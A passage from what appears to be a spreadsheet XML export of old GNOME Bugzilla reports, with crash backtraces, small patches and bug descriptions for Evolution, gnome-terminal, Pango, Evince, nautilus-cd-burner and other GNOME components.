#15 0x40765be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x404688ed in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0x40392682 in gtk_menu_shell_activate_item () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#18 0x403918ff in _gtk_menu_shell_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0x4038ad6b in gtk_menu_reorder_child () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x40382c2f in _gtk_marshal_BOOLEAN__BOXED () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x40754247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x40753ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0x40766439 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x407657af in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x40765be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x404686fb in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0x40382a27 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#28 0x40381725 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x405411a5 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#30 0x407a7b35 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#31 0x407a8b78 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#32 0x407a8e8d in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#33 0x407a958f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#34 0x4061a328 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#35 0x0809250b in main ()
No symbol table info available.
#36 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6
No symbol table info available.
#0  0xffffe002 in ?? ()
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-12-02 03:08 -------
Unknown version 1.1.x in product glade. Setting version to the default unspecified.
The original reporter (primorec@sbcglobal.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component damon@gnome.org.
</t>
  </si>
  <si>
    <t>primorec</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-339404</t>
  </si>
  <si>
    <t>Unable to change the background after a manipulation with gconf</t>
  </si>
  <si>
    <t>Please describe the problem:
After unchecking /desktop/gnome/background/draw_background entry it is
impossible to change the background even this entry is checked again.
Steps to reproduce:
1. Uncheck /desktop/gnome/background/draw_background.
2. Check this entry.
3. Try to modify the background.
Actual results:
Expected results:
Does this happen every time?
Other information:
Here is a patch which solves this bug. 
control-center-2.12.3.orig/libbackground/preferences.c      2005-11-07
19:06:45.000000000 +0100
+++ control-center-2.12.3/libbackground/preferences.c   2006-04-17
22:20:22.000000000 +0200
@@ -3617 +3617 @@
                                (prefs-&gt;wallpaper_filename != NULL) &amp;&amp;
                    strcmp (prefs-&gt;wallpaper_filename ) != 0 &amp;&amp;
                    strcmp (prefs-&gt;wallpaper_filename (none)) != 0)
-                       prefs-&gt;wallpaper_enabled = TRUE
+                       prefs-&gt;enabled = TRUE
                else
                        prefs-&gt;enabled = FALSE
        } else {</t>
  </si>
  <si>
    <t>jean.christophe.jaskula</t>
  </si>
  <si>
    <t>GTRANSLATOR-463035</t>
  </si>
  <si>
    <t>Generally bug'd</t>
  </si>
  <si>
    <t>drag and drop don't work</t>
  </si>
  <si>
    <t>I think is a problem when the absolut path is cutted. For example:
file:///home/xxx/file.po must be /home/xxx/file.po
When is doing this is allocating unnecessary memory and that is the problem.</t>
  </si>
  <si>
    <t>EPIPHANY-125589</t>
  </si>
  <si>
    <t>gtk_file_chooser_set_current_folder fails</t>
  </si>
  <si>
    <t>I don't know if this is Epiphany's problem or a problem with the new file
chooser but Epiphany crashed while attempting to download from gnome ftp.
I don't have a stack trace but a terminal display of the session follows:
[tdv@redbud tdv]$ epiphany
** (epiphany-bin:31397): WARNING **: Throbber animation not found
** (epiphany-bin:31397): WARNING **: Throbber animation not found
(epiphany-bin:31397): GLib-GObject-CRITICAL **: file gobject.c: line 1534
(g_object_unref): assertion `G_IS_OBJECT (object)' failed
(epiphany-bin:31397): Gtk-CRITICAL **: file gtkfilechooser.c: line 1000
(_gtk_file_chooser_get_file_system): assertion `GTK_IS_FILE_CHOOSER
(chooser)' failed
(epiphany-bin:31397): Gtk-CRITICAL **: file gtkfilesystem.c: line 650
(gtk_file_system_filename_to_path): assertion `GTK_IS_FILE_SYSTEM
(file_system)' failed
Segmentation fault</t>
  </si>
  <si>
    <t>EVOLUTION-232194</t>
  </si>
  <si>
    <t>GnomeCard import is incomplete</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.3
Synopsis: GnomeCard import is incomplete
Bugzilla-Product: Evolution
Bugzilla-Component: Importers
Description:
When importing from GnomeCard the are some unecpected behaviour.
a. Address information as in street po boc city and postal code 
    seems to be omitted totally.
b. Phone numbers marked as Work (presumably quite common) in
    GoneCard gets imported as category Company. It should much
    rather be imported as Business since the contact editor defaults to
    showing Business only. This essentially semi-hides the imported
    company info. 
Unknown reporter: egil@kvaleberg.no changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>DASHER-312440</t>
  </si>
  <si>
    <t>Click mode interacts badly with start</t>
  </si>
  <si>
    <t>'Start on left mouse' should probably be automatically disabled in click mode.</t>
  </si>
  <si>
    <t>VTE-514447</t>
  </si>
  <si>
    <t>patch for child setup function</t>
  </si>
  <si>
    <t>Hi the attached patch allows one to pass in a child setup function which is executed just before the exec() from vte_terminal_fork_command.
I named the new function vte_terminal_fork_command_with_setup.  The resulting changes were mostly adding the requisite two parameters to a parade of internal functions.  I was somewhat tempted to rewrite everything to be based on a structure with flags and padding approach to allow adding even more options later without requiring us to add yet another _fork_command_* function but that would have been pretty invasive.  
The current version already allows you to specify almost everything I can think of that most users would want and this new child setup function should pretty much fill in the rest.
Why do I need this patch?  For the Hotwire hypershell I wanted the ability to spawn a terminal but having its stdin redirected from a pipe.  So say you do:
cat foo | less
The cat foo runs in the Hotwire process as normal (i.e. not /bin/cat) but less expands to term less with its standard input redirected from a pipe.</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-336943</t>
  </si>
  <si>
    <t>Critical warning and crash in gnome-terminal</t>
  </si>
  <si>
    <t>Got this crash when I deleted some old profiles I had created during testing:
Thread 3 (Thread -1220265056 (LWP 12211)):
#0  0x00b62402 in ?? ()
#1  0x00125d8b in ?? () from /lib/libpthread.so.0
#2  0x002eefad in child_watch_helper_thread (data=0x0)
    at /usr/include/bits/unistd.h:35
#3  0x0030b8ef in g_thread_create_proxy (data=0x907c270) at gthread.c:582
#4  0x0012041b in start_thread (arg=0xb7443ba0) at pthread_create.c:274
#5  0x00c4827e in ?? () from /lib/libc.so.6
Thread 2 (Thread -1312724064 (LWP 12227)):
#0  0x00b62402 in ?? ()
#1  0x00c3ebf0 in *__GI___poll (fds=0xcaeff4 nfds=9 timeout=-1)
    at ../sysdeps/unix/sysv/linux/poll.c:87
#2  0x002f1363 in g_main_context_iterate (context=0x914d490 block=1 
    dispatch=1 self=0x8cdbc30) at gmain.c:2849
#3  0x002f16d9 in IA__g_main_loop_run (loop=0x914d238) at gmain.c:2751
#4  0x07628ba0 in link_io_thread_fn (data=0x0) at linc.c:394
#5  0x0030b8ef in g_thread_create_proxy (data=0x8cdbc30) at gthread.c:582
#6  0x0012041b in start_thread (arg=0xb1c16ba0) at pthread_create.c:274
#7  0x00c4827e in ?? () from /lib/libc.so.6
Thread 1 (Thread -1209104720 (LWP 12208)):
#1  0x00126c3b in ?? () from /lib/libpthread.so.0
#2  0x078a9086 in libgnomeui_segv_handle (signum=6) at gnome-ui-init.c:792
#3  
#4  0x00b62402 in ?? ()
#5  0x00ba8159 in *__GI_raise (sig=6)
    at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#6  0x00ba96e3 in *__GI_abort () at abort.c:88
#7  0x002f6b72 in IA__g_logv (log_domain=Variable log_domain is not available.
) at gmessages.c:497
#8  0x002f6ba9 in IA__g_log (log_domain=0x851467 Gtk 
    log_level=G_LOG_LEVEL_CRITICAL 
    format=0x31f61b %s: assertion `%s' failed) at gmessages.c:517
#9  0x002f6c8b in IA__g_return_if_fail_warning (log_domain=0x851467 Gtk 
    pretty_function=0x8c9fef gtk_menu_attach_to_widget 
    expression=0x8c95b4 GTK_IS_MENU (menu)) at gmessages.c:532
#10 0x0074aa5e in IA__gtk_menu_attach_to_widget (menu=0x0 
    attach_widget=0x8d18248 detacher=0x7510d0 )
    at gtkmenu.c:1031
#11 0x0075107e in IA__gtk_menu_item_set_submenu (menu_item=0x8d18248 
    submenu=0x0) at gtkmenuitem.c:366
#12 0x0806f681 in fill_in_config_picker_submenu (window=0x8d0c828)
    at terminal-window.c:423
#13 0x08070021 in terminal_window_reread_profile_list (window=0x8d0c828)
ist is not available.
)
    at terminal.c:2160
#15 0x0805fc26 in profile_list_notify (client=0x8cda8a8 cnxn_id=3003121667 
    entry=0x91cdda8 user_data=0x8ce0000) at terminal.c:2198
#16 0x076692f7 in notify_listeners_callback (listeners=0x8cde118 
    key=0x91cf390 /apps/gnome-terminal/global/profile_list 
    cnxn_id=3003121667 listener_data=0x8ce02b8 user_data=0xbfadea24)
    at gconf-client.c:2384
#17 0x0765c03b in gconf_listeners_notify (listeners=0x8cde118 
    all_above=0x91cf390 /apps/gnome-terminal/global/profile_list 
    callback=0x7669270  user_data=0xbfadea24)
    at gconf-listeners.c:589
#18 0x07669657 in notify_one_entry (client=0x8cda8a8 entry=0x91cdda8)
    at gconf-client.c:2409
#19 0x07669731 in notify_idle_callback (data=0x8cda8a8) at gconf-client.c:2449
#20 0x002ec6e1 in g_idle_dispatch (source=0x91a17c8 
    callback=0x7669690  user_data=0x8cda8a8)
    at gmain.c:3796
#21 0x002ee09d in IA__g_main_context_dispatch (context=0x8cc8ab0)
    at gmain.c:1916
#22 0x002f132f in g_main_context_iterate (context=0x8cc8ab0 block=1 
    dispatch=1 self=0x8cce420) at gmain.c:2547
#23 0x002f16d9 in IA__g_main_loop_run (loop=0x8ccae68) at gmain.c:2751
#24 0x00742594 in IA__gtk_main () at gtkmain.c:1001
#25 0x0805f684 in main (argc=8 argv=0xbfadeda4) at terminal.c:1773
#26 0x00b957e4 in __libc_start_main (main=0x805ef30  argc=2 
    ubp_av=0xbfadeda4 init=0x807f3b8  
    fini=0x807f3b0  rtld_fini=0xb70f10  
    stack_end=0xbfaded9c) at libc-start.c:231
#27 0x08054731 in _start ()
(gdb)</t>
  </si>
  <si>
    <t>EVOLUTION-209966</t>
  </si>
  <si>
    <t>evolution mail crashed on opening a message</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.13.99
Synopsis: evolution mail crashed on opening a message
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I loaded a maildir folder clicked to view a message and evolution-mail
came up with a crash dialog.
Debugging Information:
[New Thread 1024 (LWP 9881)]
[New Thread 2049 (LWP 9901)]
[New Thread 1026 (LWP 9902)]
[New Thread 2051 (LWP 9903)]
[New Thread 6148 (LWP 9910)]
[New Thread 4101 (LWP 9908)]
[New Thread 5126 (LWP 9909)]
0x40b29519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40b29519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40b999e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406ca563 in waitpid (pid=9911 stat_loc=0xbfffed2c options=0)
    at wrapsyscall.c:172
#3  0x402f3262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x08097a1e in segv_redirect (sig=11) at main.c:67
#5  0x406c8935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 2093 edi = 135399736 esi = 3221221696 ebp = 3221221656 esp = 3221221624 ebx = 1083480252 edx = 137231788 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 1083379722 cs = 35 __csh = 0 eflags = 66194 esp_at_signal = 3221221624 ss = 43 __ssh = 0 fpstate = 0xbfffee78 oldmask = 2147483648 cr2 = 4})
    at signals.c:97
#6  
#7  0x4093100a in PortableServer_POA_activate_object (obj=0x8120938 
    p_servant=0x40c16b88 ev=0xbffff140) at poa.c:719
#8  0x40c077b4 in gconf_postinit (app=0x0 mod_info=0x0) at gconf.c:2149
#9  0x40c078fd in gconf_init (argc=1 argv=0xbffff1c0 err=0x0) at gconf.c:2192
#10 0x40a53026 in get_user_level () at gnome-vfs-mime-handlers.c:1884
#11 0x40a518c9 in gnome_vfs_mime_get_value_for_user_level (
    mime_type=0x82df848 text/plain 
    key_prefix=0x40a6941a short_list_application_ids)
    at gnome-vfs-mime-handlers.c:442
#12 0x40a519d7 in gnome_vfs_mime_get_short_list_applications (
    mime_type=0x82df848 text/plain) at gnome-vfs-mime-handlers.c:533
#13 0x080888fb in mail_lookup_handler (mime_type=0x82df848 text/plain)
    at mail-format.c:422
#14 0x08088e69 in format_mime_part (part=0x82debb0 md=0x82b56a8)
    at mail-format.c:687
#15 0x08084ed4 in mail_display_redisplay (md=0x82b56a8 unscroll=1)
    at mail-display.c:1313
#16 0x08084f6d in mail_display_set_message (md=0x82b56a8 medium=0x82debb0)
    at mail-display.c:1346
#17 0x08071d88 in done_message_selected (folder=0x8228c38 
    uid=0x82ddb78 998512248.24922_0.eldritch msg=0x82debb0 data=0x82b42a0)
    at folder-browser.c:1715
#18 0x08091ca2 in get_message_got (mm=0x82ddad0) at mail-ops.c:1646
#19 0x0808e724 in mail_msgport_replied (source=0x8139108 cond=G_IO_IN 
    d=0x81390d0) at mail-mt.c:263
#20 0x40588a7a in g_io_unix_dispatch (source_data=0x8139120 
    current_time=0xbffff410 user_data=0x81390d0) at giounix.c:137
#21 0x4058a055 in g_main_dispatch (dispatch_time=0xbffff410) at gmain.c:656
#22 0x4058a659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#23 0x4058a7e8 in g_main_run (loop=0x80f9708) at gmain.c:935
#24 0x4049f65b in gtk_main () at gtkmain.c:524
#25 0x408c6547 in bonobo_main () at bonobo-main.c:283
#26 0x08097bcd in main (argc=3 argv=0xbffff634) at main.c:141
#27 0x40a8b177 in __libc_start_main (main=0x8097a48  argc=3 
    ubp_av=0xbffff634 init=0x8065088  fini=0x80cb2ec  
    rtld_fini=0x4000e184  stack_end=0xbffff62c)
    at ../sysdeps/generic/libc-start.c:129
Thread 7 (Thread 5126 (LWP 9909)):
#0  0x40a9c8a5 in __sigsuspend (set=0x4376d92c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406c80d9 in __pthread_wait_for_restart_signal (self=0x4376dc00)
    at pthread.c:934
#2  0x406c4c5c in pthread_cond_wait (cond=0x8139300 mutex=0x81392e0)
    at restart.h:34
#3  0x4007b3d0 in e_msgport_wait (mp=0x81392b8) at e-msgport.c:193
#4  0x4007baf7 in thread_dispatch (din=0x8139268) at e-msgport.c:514
#5  0x406c5bfd in pthread_start_thread (arg=0x4376dc00) at manager.c:262
Thread 6 (Thread 4101 (LWP 9908)):
#0  0x40a9c8a5 in __sigsuspend (set=0x42f6d92c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406c80d9 in __pthread_wait_for_restart_signal (self=0x42f6dc00)
    at pthread.c:934
#2  0x406c4c5c in pthread_cond_wait (cond=0x8139300 mutex=0x81392e0)
    at restart.h:34
#3  0x4007b3d0 in e_msgport_wait (mp=0x81392b8) at e-msgport.c:193
#4  0x4007baf7 in thread_dispatch (din=0x8139268) at e-msgport.c:514
#5  0x406c5bfd in pthread_start_thread (arg=0x42f6dc00) at manager.c:262
Thread 5 (Thread 6148 (LWP 9910)):
#0  0x40a9c8a5 in __sigsuspend (set=0x43f6d92c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406c80d9 in __pthread_wait_for_restart_signal (self=0x43f6dc00)
    at pthread.c:934
#2  0x406c4c5c in pthread_cond_wait (cond=0x8139258 mutex=0x8139238)
    at restart.h:34
#3  0x4007b3d0 in e_msgport_wait (mp=0x8139210) at e-msgport.c:193
#4  0x4007baf7 in thread_dispatch (din=0x81391c0) at e-msgport.c:514
#5  0x406c5bfd in pthread_start_thread (arg=0x43f6dc00) at manager.c:262
Thread 4 (Thread 2051 (LWP 9903)):
#0  0x40a9c8a5 in __sigsuspend (set=0x41f3792c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406c80d9 in __pthread_wait_for_restart_signal (self=0x41f37c00)
    at pthread.c:934
#2  0x406c4c5c in pthread_cond_wait (cond=0x8139300 mutex=0x81392e0)
    at restart.h:34
#3  0x4007b3d0 in e_msgport_wait (mp=0x81392b8) at e-msgport.c:193
#4  0x4007baf7 in thread_dispatch (din=0x8139268) at e-msgport.c:514
#5  0x406c5bfd in pthread_start_thread (arg=0x41f37c00) at manager.c:262
Thread 3 (Thread 1026 (LWP 9902)):
#0  0x40a9c8a5 in __sigsuspend (set=0x4172392c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406c80d9 in __pthread_wait_for_restart_signal (self=0x41723c00)
    at pthread.c:934
#2  0x406c4c5c in pthread_cond_wait (cond=0x8139300 mutex=0x81392e0)
    at restart.h:34
#3  0x4007b3d0 in e_msgport_wait (mp=0x81392b8) at e-msgport.c:193
#4  0x4007baf7 in thread_dispatch (din=0x8139268) at e-msgport.c:514
#5  0x406c5bfd in pthread_start_thread (arg=0x41723c00) at manager.c:262
Thread 2 (Thread 2049 (LWP 9901)):
#0  0x40b4e227 in __poll (fds=0x815c6f4 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x406c5900 in __pthread_manager (arg=0x1b) at manager.c:136
Thread 1 (Thread 1024 (LWP 9881)):
#0  0x40b29519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40b999e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406ca563 in waitpid (pid=9911 stat_loc=0xbfffed2c options=0)
    at wrapsyscall.c:172
#3  0x402f3262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x08097a1e in segv_redirect (sig=11) at main.c:67
#5  0x406c8935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 2093 edi = 135399736 esi = 3221221696 ebp = 3221221656 esp = 3221221624 ebx = 1083480252 edx = 137231788 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 1083379722 cs = 35 __csh = 0 eflags = 66194 esp_at_signal = 3221221624 ss = 43 __ssh = 0 fpstate = 0xbfffee78 oldmask = 2147483648 cr2 = 4})
    at signals.c:97
#6  
#7  0x4093100a in PortableServer_POA_activate_object (obj=0x8120938 
    p_servant=0x40c16b88 ev=0xbffff140) at poa.c:719
#8  0x40c077b4 in gconf_postinit (app=0x0 mod_info=0x0) at gconf.c:2149
#9  0x40c078fd in gconf_init (argc=1 argv=0xbffff1c0 err=0x0) at gconf.c:2192
#10 0x40a53026 in get_user_level () at gnome-vfs-mime-handlers.c:1884
#11 0x40a518c9 in gnome_vfs_mime_get_value_for_user_level (
    mime_type=0x82df848 text/plain 
    key_prefix=0x40a6941a short_list_application_ids)
    at gnome-vfs-mime-handlers.c:442
#12 0x40a519d7 in gnome_vfs_mime_get_short_list_applications (
    mime_type=0x82df848 text/plain) at gnome-vfs-mime-handlers.c:533
#13 0x080888fb in mail_lookup_handler (mime_type=0x82df848 text/plain)
    at mail-format.c:422
#14 0x08088e69 in format_mime_part (part=0x82debb0 md=0x82b56a8)
    at mail-format.c:687
#15 0x08084ed4 in mail_display_redisplay (md=0x82b56a8 unscroll=1)
    at mail-display.c:1313
#16 0x08084f6d in mail_display_set_message (md=0x82b56a8 medium=0x82debb0)
    at mail-display.c:1346
#17 0x08071d88 in done_message_selected (folder=0x8228c38 
    uid=0x82ddb78 998512248.24922_0.eldritch msg=0x82debb0 data=0x82b42a0)
    at folder-browser.c:1715
#18 0x08091ca2 in get_message_got (mm=0x82ddad0) at mail-ops.c:1646
#19 0x0808e724 in mail_msgport_replied (source=0x8139108 cond=G_IO_IN 
    d=0x81390d0) at mail-mt.c:263
#20 0x40588a7a in g_io_unix_dispatch (source_data=0x8139120 
    current_time=0xbffff410 user_data=0x81390d0) at giounix.c:137
#21 0x4058a055 in g_main_dispatch (dispatch_time=0xbffff410) at gmain.c:656
#22 0x4058a659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#23 0x4058a7e8 in g_main_run (loop=0x80f9708) at gmain.c:935
#24 0x4049f65b in gtk_main () at gtkmain.c:524
#25 0x408c6547 in bonobo_main () at bonobo-main.c:283
#26 0x08097bcd in main (argc=3 argv=0xbffff634) at main.c:141
#27 0x40a8b177 in __libc_start_main (main=0x8097a48  argc=3 
    ubp_av=0xbffff634 init=0x8065088  fini=0x80cb2ec  
    rtld_fini=0x4000e184  stack_end=0xbffff62c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40b29519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40b29519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40b999e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x406ca563 in waitpid (pid=9911 stat_loc=0xbfffed2c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffed2c
options = 0
result = 0
oldtype = 0
#3  0x402f3262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1076625408
in_segv = 1
pid = 0
#4  0x08097a1e in segv_redirect (sig=11) at main.c:67
	in main.c
sig = 11
#5  0x406c8935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 2093 edi = 135399736 esi = 3221221696 ebp = 3221221656 esp = 3221221624 ebx = 1083480252 edx = 137231788 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 1083379722 cs = 35 __csh = 0 eflags = 66194 esp_at_signal = 3221221624 ss = 43 __ssh = 0 fpstate = 0xbfffee78 oldmask = 2147483648 cr2 = 4})
    at signals.c:97
	in signals.c
signo = 0
__value = 0x80979fc U\211Ã¥SP\213]\bÃ¨7\004Ã½Ã¿\213\0250_\016\b9Ãu\025\203Ã¬\fSÂ¡\004Y\016\bÃ¿Ã\203Ã„\020\213]Ã¼Ã‰Ãƒ\211Ã¶\203Ã¬\bSRÃ¨\216Ã¬Ã¼Ã¿\203Ã„\020Ã‡E\b
#6  
No locals.
#7  0x4093100a in PortableServer_POA_activate_object (obj=0x8120938 
    p_servant=0x40c16b88 ev=0xbffff140) at poa.c:719
	in poa.c
servant = (PortableServer_ServantBase *) 0x40c16b88
new_objid = (PortableServer_ObjectId *) 0x0
new_obj = (ORBit_POAObject *) 0x82dfd78
</t>
  </si>
  <si>
    <t>frb</t>
  </si>
  <si>
    <t>EVOLUTION-214393</t>
  </si>
  <si>
    <t>File/New/New Appointment uses bad TZID</t>
  </si>
  <si>
    <t>To create the new appointment comp-editor-factory uses this:
dt.tzid = calendar_config_get_timezone ()
But that is incorrect as that is only the city name
e.g. Europe/London. You have to get the builtin timezone
from that and then get the TZID.</t>
  </si>
  <si>
    <t>MEDUSA-44043</t>
  </si>
  <si>
    <t>Make cron script able to handle install of medusa to different places</t>
  </si>
  <si>
    <t xml:space="preserve">This involves making a cron script with a .in prefix and subbing
the config install variable into where the medusa cron scripts into the
script when the script is complied
Right now we have hard coded /usr/bin/ as the prefix because that is 
what our rpms for pr2 will use.
(ie this is not for pr2 but for afterwards)
People building out of cvs will not be affected by this change since they
will use the install script in eazel-hacking which hard codes the /gnome/bin
prefix.
------- Additional Comments From rebecka@eazel.com 2000-11-06 11:16:49 ----
I have a fix for this.  Checking it in after pr2.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:44 -------
</t>
  </si>
  <si>
    <t>PANGO-341481</t>
  </si>
  <si>
    <t>cairo</t>
  </si>
  <si>
    <t>pangocairo kerning problem with nonidentity scaling</t>
  </si>
  <si>
    <t>As pointed out on the mailing list pangocairo overkerns when you scale the pango context up.  A test case is available here:
  http://mail.gnome.org/archives/gtk-i18n-list/2006-May/msg00022.html
and my analysis:
If I understand it correctly this is what happening:
  - When you choose a font size of 10pt and a ctm that scales
5x5 the font size loaded by cairo at size 50pt but glyph
metrics returned are scaled down by 5 and so dimensionally they
correspond to a 10pt font.
  - In pango_fc_font_kern_glyphs and/or pango-ot-buffer.c:apply_gpos_*
the glyph positioning applied corresponds to a 50pt font as no
distinction between font matrix and ctm is made here.
  - The glyphs are drawn to the cairo context using the 5x5
scaled ctm making the 50pt positioning effectively a 250pt
positioning.</t>
  </si>
  <si>
    <t>GNOME-UTILS-349756</t>
  </si>
  <si>
    <t>Confusing Errormessage while opening Logfile</t>
  </si>
  <si>
    <t>While opening a Logfile which is read-proteced by permissions for the user running gnome-system-log the program says  is not a Logfile.
The User should be informed that he is not allowed to read the logfile he want to open.
Other information:</t>
  </si>
  <si>
    <t>thereapman</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER-355982</t>
  </si>
  <si>
    <t>cd-burner</t>
  </si>
  <si>
    <t>burning multiple copies of a CD is excruciating (unreliably recognized CD-Rs)</t>
  </si>
  <si>
    <t>Please describe the problem:
At the end of writing the first CD I get asked: eject/make another copy/quit.  First it's not clear exactly whether I should hit eject before clicking make another copy so the interface is a bit imprecise.  But the behavior was even worse so I still don't know whether I should eject before or not.
The main problem (clearly a bug maybe in HAL) was that after inserting another CD nautilus-cd-burner would burp at me saying please insert a new CD with
sufficient space blablabla even though the CD I had just installed was indeed blank.  The CD was detected because the dialog box did include an eject button.  I then tried to click OK or first eject then OK and other variations but none worked except for: click eject then re-close the CD slot manually then wait a little for the disk to spin then finally click OK.  It's not clear if the wait was necessary but the rest seemed to be indispensable.
Usabilitywise the fact that the disk is not automatically ejected when the dialog about insert a new blank CD pops up is rather odd: how am I to insert a new CD other than by first ejecting the current one?
Steps to reproduce:
1. set things up for wrinting select write CD
2. when the write is done press eject
3. then insert a new blank CD-R disk
4. then press make another copy
You can also try to not click eject and instead to immediatly click make another copy and quickly replace the previous CD with the new one as cd-burner opens&amp;closes the drive slot.  Same thing.
Then you should get the incorrect complaint about the CD not being blank.  Click OK and notice that after a short while it comes right back still complaining that the CD is not blank.
Actual results:
Expected results:
Does this happen every time?
Yes although I have felt like there was a part of non-determinism in the way the thing failed.  Probably simply because there are sufficiently many different ways to do things (whether you open the drive-slot via eject or manually by pressing the button on the drive itself same thing for closing it and in which order you do them) and I kept trying a different one to see if some magical order worked better (I was burning a large number of CDs and it was already getting late).
Other information:
This is on a GNU/Linux Debian testing system (AMD64 X2 running in i686 mode with a DVD/CD player that looks like the following:
# cat /proc/ide/hda/model 
HL-DT-ST DVDRAM GSA-4167B
# cat /proc/ide/hda/driver 
ide-cdrom version 4.61
# cat /proc/ide/hda/settings 
name                    value           min             max             mode
----                    -----           ---             ---             ----
current_speed           66              0               70              rw
dsc_overlap             0               0               1               rw
init_speed              12              0               70              rw
io_32bit                0               0               3               rw
keepsettings            0               0               1               rw
nice1                   1               0               1               rw
number                  0               0               3               rw
pio_mode                write-only      0               255             w
unmaskirq               0               0               1               rw
using_dma               0               0               1               rw
#</t>
  </si>
  <si>
    <t>EVINCE-344160</t>
  </si>
  <si>
    <t>Evince 0.5.3 cannot open password protected pdfs</t>
  </si>
  <si>
    <t>Please describe the problem:
Evince 0.5.3 cannot open password protected pdfs even with the correct password.
I use Gentoo Linux with: poppler-0.5.3 poppler-bindings-0.5.3 and Evince-0.5.3
The pdf file is May issue of PHPArchitect.
GPDF can open it
The password is 9 characters long with numbers letters and special puntuations
Steps to reproduce:
1. Open a password protected pdf
Actual results:
keep asking password
Expected results:
pdf is opened
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>rickytato</t>
  </si>
  <si>
    <t>EEL-169866</t>
  </si>
  <si>
    <t>eel needs tighter dep dependency on gnome-vfs</t>
  </si>
  <si>
    <t>Please describe the problem:
Current versions of eel require gnome-vfs-2.9.x or higher but only list &gt;=2.7.x
as requirements in configure.in causing errors when compiling against
gnome-vfs-2.8.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>joe.mccann</t>
  </si>
  <si>
    <t>GIMP-WEB-119214</t>
  </si>
  <si>
    <t>gradient previews on website filled with extraneous information</t>
  </si>
  <si>
    <t>This concerns the website under development at http://mmmaybe.gimp.org
I wanted to fill in 'Severity: Weird' but that option wasn't available. :-)
There's a Gradients sub-section in the Resources section that has previews
(64x32 pixels) of all the custom gradients that ship with the GIMP. For
some obscure reason these images that should be no bigger than half a
kilobyte are 8 kB each. At 78 images that's a bit steep for modem users.
78 images are 78 http requests too which may not be very nice on the
server either.
I will attach a few previews I made myself which are all somewhere between
250 and 500 bytes for demonstration purposes.</t>
  </si>
  <si>
    <t>collin</t>
  </si>
  <si>
